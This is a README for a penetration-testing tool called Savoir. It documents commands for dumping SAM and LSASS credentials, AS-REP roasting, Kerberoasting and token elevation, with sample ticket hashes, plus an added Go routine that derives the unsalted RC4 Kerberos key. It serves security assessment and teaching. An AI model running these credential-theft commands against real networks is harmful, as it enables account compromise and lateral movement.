Savoir - A tool to perform tasks during internal security assessment

Savoir

Savoir is a tool to perform tasks during internal security assessments. This project helps me understand how some pentest tools work.

Build

You can build savoir for multiple platforms:

make update
make build

The build folder contains builds for multiple operating systems and architectures.

Commands

sam

savoir sam local # Windows only
savoir sam hive --sam <path/to/sam> --system <path/to/system>
savoir sam shadowcopies # Windows only

lsass

savoir lsass process --json # Windows only
savoir lsass minidump --path /path/to/lsass.dmp --json

kerberos

Ask for a TGT, then a TGS

You can also ask for a TGS directly; savoir will ask for a TGT first:

savoir kerberos asktgs --dc-ip <DC-IP> -d ubh.lab -u dany -p dany -e rc4 -r karen
$krb5tgs$23$*karen$UBH.LAB$ubh.lab/karen*$858129adc693b1a8bb62e50a51b4ffc2$9b2b...

You can ask for a TGT, save it to a kirbi file, then ask for a TGS:

# Ask a TGT and save it to dany.kirbi
savoir kerberos asktgt --dc-ip <DC-IP> -d ubh.lab -u dany -p dany -e rc4 -o dany.kirbi
TGT saved to dany.kirbi.

# Display the TGT
savoir kerberos describe --ticket dany.kirbi
ServiceName              :  krbtgt/ubh.lab
ServiceRealm             :  UBH.LAB
UserName                 :  dany
UserRealm                :  UBH.LAB
StartTime                :  2022-01-22 09:12:55 +0000 UTC
EndTime                  :  2022-01-22 19:12:55 +0000 UTC
RenewTill                :  2022-01-29 09:12:55 +0000 UTC
Flags                    :  forwardable ; proxiable ; renewable ; initial ; pre-authent
KeyType                  :  arcfour-hmac-md5
Base64(key)              :  9CrwY3aAdXdr91h7uGi9qg==

# Ask a TGS using this TGT
savoir kerberos asktgs --dc-ip <DC-IP> -d ubh.lab -t dany.kirbi -e rc4 -r karen
$krb5tgs$23$*karen$UBH.LAB$ubh.lab/karen*$ef59ed1f3fdfddf356dd93823ad8208f$228920...

Generate Kerberos keys

Note that the RC4 key is the NTLM hash (MD4(UNICODE(password))).

savoir kerberos keys --password 'Pa$$w0rd' --salt 'CONTOSO.COMAdministrator'
arcfour-hmac-md5
  Key: 92937945b518814341de3f726500d4ff
  Iterations: 00001000

aes128-cts-hmac-sha1-96
  Key: bd75e98362b16649ffbaed630d5341d0
  Iterations: 00001000

aes256-cts-hmac-sha1-96
  Key: 660e61042b190b5724c62bb473facca12058fb9ad3c03c0d2809f839c0352502
  Iterations: 00001000
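
The note above also explains why the arcfour-hmac-md5 key is the weakest of the three: it is derived from the password alone, so the salt passed on the command line only changes the AES keys, and the same password yields the same RC4 key for every account in every realm. The Go program below is an added example, not savoir's own code; it reproduces the RC4 key from the output above, and the names `md4` and `RC4Key` are assumptions made for this illustration.

```go
package main

import (
	"encoding/binary"
	"encoding/hex"
	"fmt"
	"math/bits"
	"unicode/utf16"
)

// md4 is a compact RFC 1320 implementation (Go's standard library has no MD4).
func md4(data []byte) []byte {
	msg := append(append([]byte{}, data...), 0x80)                   // 1-bit terminator
	msg = append(msg, make([]byte, (119-len(data)%64)%64)...)        // zero-pad to 56 mod 64
	msg = binary.LittleEndian.AppendUint64(msg, uint64(len(data))*8) // length in bits
	h := [4]uint32{0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476}
	shifts := [3][4]int{{3, 7, 11, 19}, {3, 5, 9, 13}, {3, 9, 11, 15}}
	for off := 0; off < len(msg); off += 64 {
		a, b, c, d := h[0], h[1], h[2], h[3]
		for i := 0; i < 48; i++ {
			f, k := (b&c)|(^b&d), i%16 // round 1: selection function, words in order
			switch i / 16 {
			case 1: // round 2: majority function, column-wise word order
				f, k = ((b&c)|(b&d)|(c&d))+0x5a827999, (k%4)*4+k/4
			case 2: // round 3: parity function, bit-reversed word order
				f, k = (b^c^d)+0x6ed9eba1, int(bits.Reverse8(uint8(k))>>4)
			}
			w := binary.LittleEndian.Uint32(msg[off+4*k:])
			a = bits.RotateLeft32(a+f+w, shifts[i/16][i%4])
			a, b, c, d = d, a, b, c
		}
		h[0], h[1], h[2], h[3] = h[0]+a, h[1]+b, h[2]+c, h[3]+d
	}
	out := make([]byte, 0, 16)
	for _, v := range h {
		out = binary.LittleEndian.AppendUint32(out, v)
	}
	return out
}

// RC4Key (hypothetical name) derives the arcfour-hmac-md5 key; it takes no salt.
func RC4Key(password string) string {
	var buf []byte
	for _, u := range utf16.Encode([]rune(password)) {
		buf = binary.LittleEndian.AppendUint16(buf, u) // UTF-16LE code units
	}
	return hex.EncodeToString(md4(buf))
}

func main() { fmt.Println(RC4Key("Pa$$w0rd")) } // the README's sample password
```

Because no salt or iteration count enters this derivation, disabling RC4 as a permitted Kerberos encryption type removes the unsalted key from ticket exchanges.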

AS-REP roasting

A user account may have the option "Do not require Kerberos preauthentication" checked.

savoir kerberos asktgt --dc-ip <DOMAIN_IP> -d <DOMAIN> -u <USERNAME> -p <USER_PASSWORD> -e rc4 --format=john

Kerberoasting

savoir kerberos asktgs --dc-ip <DOMAIN_IP> -d <DOMAIN> -u <USERNAME> -p <USER_PASSWORD> -e rc4 -r <TARGET_USER>

token

savoir token elevate -x cmd.exe # Windows only

webscreenshot

This command takes a screenshot of a URL using a headless browser.

savoir webscreenshot --url {url} --renderer {chrome|chromium|firefox} --renderer-path {path}

Credits
